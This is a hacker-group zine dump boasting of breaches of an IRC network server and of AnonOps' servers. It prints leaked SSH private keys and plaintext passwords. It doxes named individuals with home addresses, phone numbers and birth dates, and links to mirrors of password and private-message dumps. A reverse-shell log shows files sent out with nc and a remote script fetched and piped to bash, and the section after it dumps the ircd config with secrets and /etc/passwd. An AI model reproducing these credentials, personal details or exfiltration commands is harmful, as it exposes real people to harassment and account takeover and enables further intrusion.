drwxr-xr-x 2 backup users 1640 2010-10-11 15:49 phantom
drwxr-xr-x 2 backup users 1680 2011-01-13 15:57 sidewinder
drwx------ 2 backup users 320 2011-08-12 18:52 .ssh
drwxr-xr-x 2 backup users 1176 2009-10-14 10:52 sydex
-rw------- 1 backup 1452 4999 2011-08-12 18:52 .viminfo
backup () sidewinder ~/.ssh> cat id_dsa id_rsa # not identity, its not ASCII
-----BEGIN DSA PRIVATE KEY-----
MIIDPwIBAAKCAQEA1KnQoLv0drmXUon9nIZUlXhQ7f6iMU0o5xlpbUg0Kwx5cXVB
mhn4gsr4CDk49+fYr29tuHn0NycY2lwuaMUV2yP15Pd05Wx/jgYgKTdaqZaZaIPX
OXbGAdFz3cd13g5pTAwDLblNp6gI4PlcXO/adN1ywOyLzVCmPHcBZqevPLMcL52v
b2ECeBuXKU5Z9leFoOF9IdkhZXTnsvj/yFLy8ZMpBD5JUyCXTfXw7cZZUko1X5wg
1lN76c+A0JKm0cMq8+NvA8ufRaGL2FXUv3McljrcTaRXMksWG3Z/KxEHsh3UY+pH
iNFESYED0jl4o84P6GLIxr7hlqQxpV0TyhwCiQIVALmyxXXqqqrEa83KyCyz557b
qdaLAoIBAQC3+GjuKabODKLSiRAgngwq88L1OJ45HtXyLIBudHLky0JM/nbUVx4f
coQip4jeLx17cMHK7Q/8gY13O81eQe8+IZ2De94PFL2troDsEW28R+7LOKcvidWp
+y2edoU77+/p2aLBUwmiYxlcmX1+w0iH/U/eMZUjtQJ6rawWFnaykBUazZjFNQdn
ZNusvxa4SKOf9Nx5qyXwSW52gqd1dNnrJFu0C10p3Y6ErllVwp5iUTAPPlOeGFnD
hoeu9FiLMVmJHzmiNDLCr6koBkEv+xQl6aL3DQRC7PymyYitltXTf1bf49kDrMWC
7BWuV3PD2pStnu1APfBALYI4DYplfO8MAoIBAQCRKSygD8aMdX83qgMCM6tphVun
snCtDZXhqLpx70aQvgZWoKYQLzdjdcicdSn9JtiWiUOzeS9A4ee5pizMwQOcbn1R
mnwIJe+36EwvCB1nhcwClGJz1ZFVR3JjMJAWob4LkYKnWPjvbLotjr1nMwCKyYRp
swTW1YZFfmodQkoPwdZ4dNKAyxxbLtWCL//l0WlTuzAfVTV4xxI/+BcfaxwW8O9W
XGj/dQwT8TjSqSUlJ2o5S6NX1tD0CmpfJ6JhcEIhAgcO2D2H15h+SZQCGkTB5Lx6
yI4A1msNuosa2+e8txxkoFZ/zIN2EdSqI5nkybOEpq971I8y1ieYtN0bH1MlAhRm
ovpJJvoWRqPg6WS+lyV49RWzMw==
-----END DSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
MIIEoAIBAAKCAQEA43hMo7RV/7O4jNNzcGLrA2NA7kzA3RkcYnNw/lX2iJd0qR2n
a+GEySa/RtAbRRrxTDRgQ4H4LvrNGttoRIUS6gsMNpC4jxHUhzdYQikedNUNEA81
Ro7qMOULpRy9eoE0kntWIxyi5lpoSKR67KEkfhoChSe3ZEa0HqGumGWvhKJIdNtZ
Rd3GJc9HvzIr5rKxgmw4oQP9AHhhuwHTmVVLpkCI+eL8uemH+Bp8BHGNXZ4RtN50
oFB+09vtTfgCELYtAjZf6LQMCqdu6wLDx6VPxz1L6ukSoU6Oljka7Ktxjd9YR/ZU
dbmORCArArxW606rbLa9vspcWXpWBbNEwyiCXQIBIwKCAQBUfSPHxqOZfUSMFAZO
UKBu+PrcKyMQSyfMy8riH+3a9m0o3yDtjkdDZinJ2ESko5t0E3Q2VNiGemlwYB9p
6EjalmOfPRFZtipeG970AKTpkPY5KjhcCTJp7qyNyNip2DgZJn8UWxfvKOTnyBBm
hP7tAli1HWFfwn1qdpFOjCs/484Gryp0q+WFdrNrPJ1/8zqAUyqJj0cTXv6Pyeyl
RGkFmggFQgjhT/+rlrbqreMaiUMxUT2GjlvDNATrIydQVFyxIuF2El5lTVRWzV0m
rxTLTzxmZkgum+ANEC5pBNqGiTkPa2sCvRC3gtKmaZmFh6bv2/bbFOYCOEyHMfML
tQLPAoGBAPVaMLkmuQW+CUfGb+qCz/pHxDVG0Vj97GFgs1eIoskn5/3CSX9tkkTV
mKHQ3cFiV0QJWyy0MQOCTzC/yHPRj0DrZqsnOVufc1HVIADck1NKBVcXUyhRlbcB
1qW3IXeagr+lmZeVB+8WtM3oD9d8HY+Gvx+4O8ES9Am85kGfuQ8TAoGBAO1XcJBH
fVZ2mhzrvJlaLHwv730i6/hYPXphB3UYq48gfsRkhT4BbDBUiZ7201TbN7ZOHrX4
AqumdtayqYbdCLd0+6SDmAELsrAsMAM0JuvjsWXnR3a+i1T7D4Iay62c13UqFCae
PnIrqK/Qy0SRiNCbRPG4uM2PUS96Wjm1JabPAoGAfi5iM1W+PXetAFdswb+eKPG1
XTpdCTIhy64TFxMR48thXe7j+GQ8mG3Zd8qArJj5rfYu48piWZN5LwOLqUczuvy4
dUdfU7EWvF76hBmq2mCVCDfhn7Tt6Rbjayr7RNMeq7RAXJXJkOcbKBDyNE51mkVM
WXSxBDWiE6L6Ex7xdXcCgYA9B9sdyT18oiehCWsC3Kxacrns+lnvZyXAYhfcSCwd
fWJtA+e/fLVrg3PYa1rp7zo2MVharX0HkTSAWdPSONZbD3PoeZwdhqpKjwUII1p3
K+vJvyEBRvCg0tgaJCW+7dEA3u89IWCDwhVvCc3ebpDlLz2dPiDkZq557EMWJ0Qy
NQKBgFpovHwPC5k1bX9y2Sv7J+YgIiDgELsOxF9UQzWFzb1XCPczUA027RZTgLJX
ILQi0R8af8yCpxN3PUSQXtWwZXZMJZF9puFM2vXRe1Xd3kuZg4BEkoVtB5hYK5oE
yqzQAbROM2rLILM6Bj+zro5IApDQxJ4FokvNfhJm2JzdiSmo
-----END RSA PRIVATE KEY-----
jared () sidewinder netonecom net weJAruSE
http://www.2shared.com/file/-gqbHglO/jared.html (NicE priv8 keyz ;))
trix () sidewinder netonecom net trix4kids
molkmin -> jared: ah, you plan on lettingothers ssh in?
jared -> molkmin: no i thought you did
molkmin -> jared: hell no.
jared -> molkmin: okay well then forget what i said
molkmin -> jared: there are like 5 people that can ssh into sidewinder
molkmin -> jared: or maybe 7
jared -> molkmin: and only 2 of them are convicted felons
molkmin -> jared: I just recently secured SSH
jared -> molkmin: ahh so it won't allow IPs other than ours <<< You use open proxies too?
molkmin -> jared: got hacked..user used an account name of "test" password "test" <<< LOL
jared -> molkmin: grr
:: 0x06 - d0x ::
Axod
Name: Jimmy Moore
Location: Probably out of the UK
NickServ: axod:383cf3a3f7c2
Oper: axod:ce18da2ddae4
Email: jimmy.moore () gmail com
Email2: jimmy () axod net
Email3: axod () axod net
Email4: axodmedia () gmail com
Mugshot: http://a1.twimg.com/profile_images/71426235/Photo_175.jpg
http://bizzy.co.uk/uk/05956691/axod-media
http://twitter.com/#!/mibbit
http://twitter.com/#!/axod
http://digg.com/axod
http://axod.blogspot.com/
Azander
Name: Alanon Zander
Address: 2132 South 29 Rd Cadillac, MI 49601
NickServ: Azander:kikicat
Oper: azander:flagon3
Email: alanonzander () gmail com <<< kikicat
Email2: alanonzander () yahoo com <<< password recovery sends back to gmail LOL
https://plus.google.com/113170461621014873855/posts
http://www.myspace.com/alanonzander
http://user.netonecom.net/~azander/alanon.htm
Havvy
Name: Ryan Havvy
Age: 18?
Address: Somewhere in Washougal, WA
NickServ: Havvy:hmagic
Oper: havvy:hknight
Email: ryan.havvy () gmail com
http://twitter.com/#!/havvy
http://havvy.wordpress.com/
http://www.stumbleupon.com/stumbler/Havvy/
havvy havvy
xkcd.com/936/ Password security explained in a couple panels.
10 Aug ^^^ coming from someone whose passwords are 6 lowercase characters?? hahahah
Hercule
Name: Jürgen Wind
Location: Germany
NickServ: Hercule:herc47
Oper: hercule:0b2ac71dc51f
Email: jwind () gmx de
Joshua
Name: Joshua Luckers
Age: 23
DOB: 06/15/1988
NickServ: Joshua:TwEaKeRs
Oper: joshua:ec31e1a98607
Email: joshua () sensiva net
Mugshot:http://mediacdn.disqus.com/uploads/users/146/1862/avatar92.jpg
http://joshualuckers.nl/
Kitsune
Name: Todd Parker
Email: kitsune () sbcglobal net
NickServ: Kitsune:undquiet
Oper: kitsune:$5T`mIb5705
http://nenolod.net/~nenolod/mibbit-debacle.html
Molkmin
Name: Thomas W Lyon
Age: 58
DOB: 06/04/1953
Address: 2188 US Highway 10 Sears, MI 49679-8073
NickServ: molkmin:sotw1btn
Oper: molkmin:ghotisotwbtn
Email: tlyon () netonecom net
Email2: fxrocker () gmail com
Phone: 231-734-6144
http://www.netonecom.net
http://photobucket.com/home/molkmin <<< molkmin:sotw1btn
http://twitter.com/#!/molkmin <<< molkmin:sotw1btn
Pottsi
Name: Ian Potts
Age: 24
Location: Manchester, UK
NickServ: pottsi:digger
Email: pottsi () pottsi com
Email2: ian1potts () aol com
Email3: iantom90 () hotmail co uk
http://pottsi.com/
http://www.myspace.com/56242380
Sindacious
Name: James Clifton Newton
Age: 19
DOB: 05/06/1992
Address: 1506 Jenks Ave Panama City, FL 32405
Oper: sindacious:284adflgy343
Phone: 785-746-0322, 850-215-2518
Email: admin () SinIRC net
http://sindacio.us/
http://www.sindacious.com (It just redirects to sindacio.us)
http://twitter.com/sindacious
:: 0x07 - exit ::
K1LL Th3 G1b50n!
attachm3nts >>>
n3t0nec0m shad0ws
m1rr0r 1: http://www.mediafire.com/file/mdlc4wibpacevv6/swshadow
m1rr0r 2: http://www.2shared.com/file/Axzg1umn/swshadow.html
w1k1 pass3s
m1rr0r 1: http://www.mediafire.com/?s9c9jtns5tp8oux
m1rr0r 2: http://www.2shared.com/file/pAg2gqyb/mibbitwiki.html
n1cks3rv pass3s
m1rr0r 1: http://www.mediafire.com/?g8hpr34ssu1ssdq
m1rr0r 2: http://www.2shared.com/document/TLTX8j3E/fullnspassdump.html
pMs
m1rr0r 1: http://www.2shared.com/file/Eq3cyC7f/mibbitpms.html
m1rr0r 2: http://tools.mibbit.com/mibbitpms.out :PppPpPPPPppppppp
cHaN msGs
http://www.2shared.com/file/5Kf08Z3-/mibbitchanmsgs.html
root () tools:~# wall <<< "E0F"
Broadcast Message from root () tools
(/dev/pts/3) at [redacted] ...
E0F

816
htp/HTP-3.txt Normal file
View File

@ -0,0 +1,816 @@
888 888 d8888 .d8888b. 888 d8P
888 888 d88888 d88P Y88b 888 d8P
888 888 d88P888 888 888 888 d8P
8888888888 d88P 888 888 888d88K
888 888 d88P 888 888 8888888b
888 888 d88P 888 888 888 888 Y88b
888 888 d8888888888 Y88b d88P 888 Y88b
888 888 d88P 888 "Y8888P" 888 Y88b
_____
8888888888 888 ,-:` \;',`'-
888 888 .'-;_,; ':-;_,'.
888 888 /; '/ , _`.-\
8888888 888 | '`. (` /` ` \`|
888 888 |:. `\`-. \_ / |
888 888 | ( `, .`\ ;'|
888 888 \ | .' `-'/
8888888888 88888888 `. ;/ .'
`'-._____.-'`
8888888b. 888 d8888 888b 888 8888888888 88888888888 d8888
888 Y88b 888 d88888 8888b 888 888 888 d88888
888 888 888 d88P888 88888b 888 888 888 d88P888
888 d88P 888 d88P 888 888Y88b 888 8888888 888 d88P 888
8888888P" 888 d88P 888 888 Y88b888 888 888 d88P 888
888 888 d88P 888 888 Y88888 888 888 d88P 888
888 888 d8888888888 888 Y8888 888 888 d8888888888
888 88888888 d88P 888 888 Y888 8888888888 888 d88P 888
<shitstorm> lol who the fuck is carlos
CARLOS1337
PRESENTE
LOL ANONOPS MUERTO
CERO DIA EDICION
┌─────────────────────────┐
│ :: Table of Contents :: │
├─────────────────────────┤
│ 0x01 ~ Prefac3 │
├─────────────────────────┤
│ 0x02 ~ s3rv1c3s pwn │
├─────────────────────────┤
│ 0x03 ~ iRCd pwn │
├─────────────────────────┤
│ 0x04 ~ b0x pwn │
├─────────────────────────┤
│ 0x05 ~ 1ps │
├─────────────────────────┤
│ 0x06 ~ l0l sh1t │
├─────────────────────────┤
│ 0x07 ~ FiL3z │
├─────────────────────────┤
│ 0x08 ~ ex1t │
└─────────────────────────┘
:: 0x01 - Prefac3 ::
Over the course of the following months, it has become very clear to us that
AnonOps no longer stands for the values of open speech, freedom of opinion and
has instead transformed itself into a network rampent with trolls, abusive
channel operators, and a generally unwelcoming place for those whom wish to
communicate and gather to fight the powers of corruption, and those whom wish
to censor our open internet. Various attempts have been made in the past to
course correct AnonOps, but the totalitarian IRC operator regime has remained
intact.
The AnonOps network prides itself in being "secure", however, such is not
the case. Rather, they employ incompetent and highly unprofessional channel and
IRC operators, allowing their personal grudges to interfere with the operation
of a secure network for Anonymous. Newcomers to the network are welcomed by a
spirit of condescention and arrogance, as any legitimate question or concern is
slowly drowned out by the laughter of the senior members of the chatroom.
Channel operators rather than discourage such behavior, applaud it, joining in,
and using their powers to kick, ban, or SAJOIN newcomers to #kill. Any attempt
to speak out against the way the network is ran is met with kick, ban, or zline.
A decentralized organization such as Anonymous cannot thrive on a network ran by
such people as Power2All, Wolfy, Owen and Shitstorm. Anonymous transcends beyond
one IRC network, or one social medium. Spread. Be aware. Educate. Anonymous is
an idea; ideas are bulletproof.
Anonymous cannot be owned or controlled by a small group of faggot
totaltarian operators. Thus we have decided to lombotomize the cancer that is
AnonOps from the internet. AnonOps no longer stands with Anonymous, but rather
against us as an agent of censorship, unlulzy pseudo-activism and immense
faggotry, and thus must be eliminated.
AnonOps has proven itself insecure and fault prone in the past. We are here
to illustrate these points again. AnonOps is NOT Anonymous, and throughtheir
actions, they have proven themselves against our ideals. Welcome to thecourt of
the internet, AnonOps. You shall be persecuted for your crimes against the
freedom of chats, your utter and repeated failure as an IRC network, your aid to
the spread of namefagging, and your gross negligence in securing the identities
of those whom chat and remain Anonymous on your network.
AnonOps has shown time and time again it is too large of a target, and very
well capable of corrupting the ideals which fuels the fight in every Anon.
As long as AnonOps stay online, they will continue to adulterate our cause,
bastardizing ideals of Anonymous, and running a network where the only lulz to
be had are that of the failures whom chat there and run the network. Such
activity cannot continue.
Let's drop the formalities now, and get down to business!
:: 0x02 - s3rv1c3s pwn ::
¡HOLA! ¡CARLOS1337 AQUI CON UN NUEVO ZINE!
~~~ JAJA ANONOPS ESTOY MUERTO: ¡AY CARAMBA! ¡UNA CERO DIA! ~~~
After probing AnonOps for quite a while, we figured out that they were using
a vulnerable version of Anope IRC Services. With a bit of luck, and an in house
zero day we were able to get ourselves a reverse shell.
connect to [REDACTED] from 46.182.105.86 38604
[anonops@ns1 ~]$ id
uid=502(anonops) gid=502(anonops) groups=502(anonops)
# Let's go ahead and snag ourselves some juicy files...
[anonops@ns1 ~]$ cd ~/inspircd/run/conf
[anonops@ns1 conf]$ nc htp 443 < inspircd.conf
[anonops@ns1 conf]$ cd ~/services
[anonops@ns1 services]$ nc htp 443 < nick.db
[anonops@ns1 services]$ nc htp 443 < chan.db
[anonops@ns1 services]$ nc htp 443 < oper.db
[anonops@ns1 services]$ nc htp 443 < os_info.db
# And then let's go ahead and hook services.
[anonops@ns1 services]$ curl http://secret.hep.cc/lol.sh | bash >/dev/null 2>&1
[anonops@ns1 services]$ killall services; ./services; exit
:: 0x02 - iRCd pwn ::
¡Dios Mios!
<admin name="AnonOps" nick="AnonOps" email="AnonOpsNetwork@gmail.com">
<power hash="sha256"
diepass="62b0ddb2bda9dd3cd239f6ae21c88ef13d2e70d27e0f79fbf88be0f1575ed8fb"
restartpass="ca985667598484ddf516e3b2f445491b4c31e82963422dd07d305bcc4d24ff65">
<connect name="localhost" allow="127.0.0.0/8" timeout="90" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" globalmax="1000" useident="no" limit="5000"
modes="+xiw">
<connect name="vpn" allow="46.236.2.47" timeout="40" pingfreq="120"
hardsendq="786432" softsendq="8192" recvq="8192" threshold="10"
commandrate="1000" fakelag="on" localmax="10" globalmax="10" useident="no"
modes="+xiw">
<connect name="mibbit1" allow="64.62.228.82" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+xwi">
<connect name="mibbit2" allow="207.192.75.252" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit3" allow="78.129.202.38" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="mibbit4" allow="109.169.29.95" timeout="40" pingfreq="120"
hardsendq="131074" recvq="4096" threshold="5" fakelag="on" localmax="5000"
globalmax="5000" useident="no" modes="+wxi">
<connect name="main" allow="*" timeout="10" pingfreq="120" hardsendq="786432"
softsendq="8192" recvq="8192" threshold="10" commandrate="1000" fakelag="on"
localmax="2" globalmax="3" useident="no" limit="5000" modes="+xiw">
<cidr ipv4clone="32" ipv6clone="128">
<channels users="50" opers="100">
<banlist chan="*" limit="128">
<options prefixquit="Quit: " suffixquit="" prefixpart="" suffixpart=""
fixedquit="" fixedpart="" syntaxhints="no" cyclehosts="no"
cyclehostsfromuser="no" ircumsgprefix="no" announcets="no"
allowmismatched="no" defaultbind="auto" hostintopic="no" pingwarning="15"
serverpingfreq="300" defaultmodes="nt" exemptchanops="NcBS"
invitebypassmodes="no">
<performance netbuffersize="10240" maxwho="20" somaxconn="128" softlimit="1024"
quietbursts="yes" nouserdns="no">
<security announceinvites="dynamic" hideulines="yes" flatlinks="yes"
hidewhois="AnonOps" hidebans="yes" hidekills="Killer" hidesplits="yes"
maxtargets="20" customversion="AnonOpsIRC" operspywhois="yes"
restrictbannedusers="yes" genericoper="yes" userstats="">
<limits maxnick="31" maxchan="31" maxmodes="20" maxident="11" maxquit="100"
maxtopic="307" maxkick="150" maxgecos="30" maxaway="30">
<whowas groupsize="3" maxgroups="5000" maxkeep="3d">
<insane hostmasks="yes" ipmasks="yes" nickmasks="yes" trigger="75">
<badnick nick="ChanServ" reason="Reserved For Services">
<badnick nick="NickServ" reason="Reserved For Services">
<badnick nick="OperServ" reason="Reserved For Services">
<badnick nick="MemoServ" reason="Reserved For Services">
<badnick nick="BotServ" reason="Reserved For Services">
<badnick nick="vHostServ" reason="Reserved For Services">
<badhost host="IRCLOIC@*" reason="wrong server">
<uline server="services.anonops.in" silent="yes">
<uline server="defender.anonops.in" silent="yes">
# Oper Classes
<class name="Root"
commands="DIE RESTART RSQUIT JUMPSERVER LOCKSERV UNLOCKSERV SQUIT
GRELOADMODULE CLEARCACHE">
<class name="Shutdown" commands="REHASH LOADMODULE UNLOADMODULE RELOAD
GLOADMODULE GUNLOADMODULE SQUIT"
privs="users/auspex channels/auspex servers/auspex users/mass-message
channels/high-join-limit channels/set-permanent users/flood/no-throttle
users/flood/increased-buffers" usermodes="*" chanmodes="*">
<class name="ServerLink" commands="CONNECT RCONNECT MKPASSWD ALLTIME SWHOIS
CLOSE TAXONOMY" usermodes="*" chanmodes="*" privs="servers/auspex">
<class name="BanControl" commands="KILL GLINE KLINE ZLINE QLINE ELINE TLINE
RLINE CHECK NICKLOCK NICKUNLOCK SHUN CLONES" privs="channels/auspex
channels/high-join-limit" usermodes="*" chanmodes="*">
<class name="OperChat" commands="WALLOPS GLOBOPS SETIDLE" usermodes="*"
chanmodes="*" privs="users/mass-message">
<class name="HostCloak" commands="SETHOST SETIDENT SETNAME CHGHOST CHGIDENT
CHECK CHGNAME" usermodes="*" chanmodes="*">
<class name="OperUnlag" privs="users/flood/no-throttle
users/flood/increased-buffers">
<class name="ServAdmin" commands="SAMODE SAJOIN SAPART SANICK SAQUIT SATOPIC
OJOIN FILTER CBAN">
# Oper Types
<type name="RootAdmin" classes="Root Shutdown ServerLink BanControl OperChat
HostCloak OperUnlag ServAdmin" vhost="netadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC BANWALK">
<type name="NetAdmin" classes="OperChat BanControl HostCloak Shutdown
ServerLink OperUnlag ServAdmin" vhost="netadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
<type name="GlobalOp" classes="OperChat HostCloak BanControl OperUnlag ServerLink"
vhost="ircop.anonops.in" override="KICK MODEOP MODEDEOP MODEVOICE
MODEDEVOICE MODEHALFOP MODEDEHALFOP">
<type name="Helper" classes="HostCloak" vhost="helper.anonops.in">
<type name="ServicesAdmin" classes="OperChat HostCloak OperUnlag BanControl
ServerLink Shutdown" vhost="servadmin.anonops.li"
override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
# Oper List
<oper name="power2all" hash="sha256"
password="e6275286066acd1939ee617fd8481903b5de5b3573d00835481db7024f8cc488"
host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="Cody" hash="sha256"
password="1698c6b760f79d808b27dc8d2605acafbbf53cdf78d3603a0883b8df2f483b9f"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pi" hash="sha256"
password="c12c6c10bfe35d2facfede647fb6651ea0074660d17ee3af3bd7831d087d44ce"
host="*@*" vhost="anonops.staff" type="RootAdmin">
<oper name="p0ke" hash="sha256"
password="a214007b665299c451106a9ea16687ec845d9131646de9099521d34065d98ac6"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="jaychow" hash="sha256"
password="2037df642493897250048bb739d3237c11aabb48e4e00dfa9f75dc163bda1742"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="shitstorm" hash="sha256"
password="1eba91646d70e6634e3014a3167c6e0efa3a2809472645711d8306b787322821"
host="*@*" vhost="staff.anonops.li" type="RootAdmin">
#<oper name="Isis" hash="sha256"
# password="61f317d24a98796f28c387c0db5cebe475cd5dcd67963e68fafabc22d79636b7"
# host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="Nerdo" hash="sha256"
# password="7bbc72b57333b8f4dbbab0d88847e2f25d6cd5926876b0fad07db2469151e046"
# host="*@*" vhost="staff.anonops.li" type="RootAdmin">
<oper name="evilworks" hash="sha256"
password="8a6d07285f406fb3c894c30545ef9514cd3056b6316dd016e0365c43de7e6b7b"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="Jupiler" hash="sha256"
password="96803102354be6a01acfd47e62eb0eace11fa6aff44e20fc94afe9244f4038a3"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
#<oper name="sharpie" hash="sha256"
# password="24dd9c6aab6e116fbb62f9aa5cba78ccd0b9852c929064e5ae07cebd29a20db7"
# host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="daboogieman" hash="sha256"
password="0e3b8fa38cfae600196897531e5b1b96059c6041b9ad68eec1ba0ed91a1d6027"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
<oper name="pie" hash="sha256"
password="5bc4d814c4ed162f2cea2a40ffb156f2cac198ddf24316a2de6e3614cc892461"
host="*@*" vhost="staff.anonops.li" type="NetAdmin">
# Default Modules Configs
<module name="m_md5.so">
<module name="m_sha256.so">
<module name="m_ripemd160.so">
<module name="m_alias.so">
<alias text="NICKSERV" replace="PRIVMSG NickServ :$2-" requires="NickServ"
uline="yes">
<alias text="CHANSERV" replace="PRIVMSG ChanServ :$2-" requires="ChanServ"
uline="yes">
<alias text="OPERSERV" replace="PRIVMSG OperServ :$2-" requires="OperServ"
uline="yes" operonly="yes">
<alias text="BOTSERV" replace="PRIVMSG BotServ :$2-" requires="BotServ"
uline="yes">
<alias text="HOSTSERV" replace="PRIVMSG HostServ :$2-" requires="HostServ"
uline="yes">
<alias text="MEMOSERV" replace="PRIVMSG MemoServ :$2-" requires="MemoServ"
uline="yes">
<alias text="NS" replace="PRIVMSG NickServ :$2-" requires="NickServ" uline="yes">
<alias text="CS" replace="PRIVMSG ChanServ :$2-" requires="ChanServ" uline="yes">
<alias text="OS" replace="PRIVMSG OperServ :$2-" requires="OperServ" uline="yes"
operonly="yes">
<alias text="BS" replace="PRIVMSG BotServ :$2-" requires="BotServ" uline="yes">
<alias text="HS" replace="PRIVMSG HostServ :$2-" requires="HostServ" uline="yes">
<alias text="MS" replace="PRIVMSG MemoServ :$2-" requires="MemoServ" uline="yes">
<alias text="IDENTIFY" replace="PRIVMSG NickServ :IDENTIFY $2" requires="NickServ"
uline="yes">
<module name="m_allowinvite.so">
<module name="m_alltime.so">
<module name="m_auditorium.so">
<auditorium opvisible="no" opcansee="yes" opercansee="yes">
<module name="m_blockcolor.so">
<module name="m_botmode.so">
<module name="m_callerid.so">
<callerid maxaccepts="16" operoverride="yes" tracknick="no" cooldown="120">
<module name="m_chancreate.so">
<module name="m_chanprotect.so">
<chanprotect noservices="no" qprefix="~" aprefix="&amp;" deprotectself="yes"
deprotectothers="yes">
<module name="m_check.so">
<module name="m_chghost.so">
<module name="m_chgident.so">
<module name="m_chgname.so">
<module name="m_cloaking.so">
<cloak mode="full" key="bubrafuKuWazunustFrUvacuvezawrU4rEgu" prefix="AN-">
<module name="m_close.so">
<module name="m_clones.so">
<module name="m_conn_umodes.so">
#<module name="m_connectban.so">
#<connectban threshold="4" duration="10m" ipv4cidr="32" ipv6cidr="128">
<module name="m_dccallow.so">
<dccallow blockchat="yes" length="0" action="block">
<banfile pattern="*" action="block">
<module name="m_delayjoin.so">
<module name="m_devoice.so">
<module name="m_dnsbl.so">
<dnsbl name="DroneBL" type="bitmask" domain="dnsbl.dronebl.org" action="ZLINE"
reason="DroneBL" duration="30d" bitmask="253">
<dnsbl name="ProxyBL" type="bitmask" domain="dnsbl.proxybl.org" action="ZLINE"
reason="ProxyBL" duration="30d" bitmask="253">
<dnsbl name="efnetRBL" type="bitmask" domain="rbl.efnet.org" action="ZLINE"
reason="EFnetRBL" duration="30d" bitmask="253">
<module name="m_filter.so">
<filteropts engine="pcre">
<module name="m_globalload.so">
<module name="m_globops.so">
<module name="m_halfop.so">
<module name="m_hidechans.so">
<hidechans affectsopers="false">
<module name="m_hideoper.so">
<module name="m_inviteexception.so">
<module name="m_joinflood.so">
<module name="m_knock.so">
<module name="m_lockserv.so">
<module name="m_maphide.so">
<module name="m_messageflood.so">
<module name="m_muteban.so">
<module name="m_conn_waitpong.so">
<waitpong sendsnotice="yes" killonbadreply="no">
<module name="m_nickflood.so">
<module name="m_nicklock.so">
<module name="m_nonotice.so">
<module name="m_noctcp.so">
<module name="m_nokicks.so">
<module name="m_nonicks.so">
#Oper modules
<module name="m_operchans.so">
<module name="m_ojoin.so">
<ojoin prefix="" notice="no" op="no">
<module name="m_operjoin.so">
<operjoin channel="#opers" override="no">
<module name="m_opermotd.so">
<opermotd file="oper.motd" onoper="yes">
<module name="m_override.so">
<module name="m_password_hash.so">
<module name="m_redirect.so">
<module name="m_regex_glob.so">
<module name="m_regex_posix.so">
<module name="m_regex_pcre.so">
<module name="m_regonlycreate.so">
<module name="m_rline.so">
<module name="m_sajoin.so">
<module name="m_sakick.so">
<module name="m_samode.so">
<module name="m_sanick.so">
<module name="m_sapart.so">
<module name="m_satopic.so">
<module name="m_securelist.so">
<securehost exception="*@*.searchirc.org">
<securehost exception="*@*.netsplit.de">
<securehost exception="*@bot.search.mibbit.com">
<module name="m_sethost.so">
<module name="m_setident.so">
<module name="m_setname.so">
<module name="m_seenicks.so">
<module name="m_services_account.so">
<module name="m_showwhois.so">
<module name="m_shun.so">
<shun enabledcommands="PING PONG QUIT PART" notifyuser="no" affectopers="no">
<module name="m_spanningtree.so">
<module name="m_sslmodes.so">
<module name="m_ssl_gnutls.so">
<module name="m_sslinfo.so">
<module name="m_stripcolor.so">
<module name="m_svshold.so">
<module name="m_swhois.so">
<module name="m_timedbans.so">
<module name="m_tline.so">
#<module name="m_xline_db.so">
#Mibbit Blocks
<module name="m_cgiirc.so">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="64.62.228.82">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="207.192.75.252">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="78.129.202.38">
<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
mask="109.169.29.95">
# P0ke's WebIRC
<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="127.0.0.1">
:: 0x04 - b0x pwn ::
[anonops@ns1 run]$ base64 utmp
[anonops@ns1 etc]$ cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
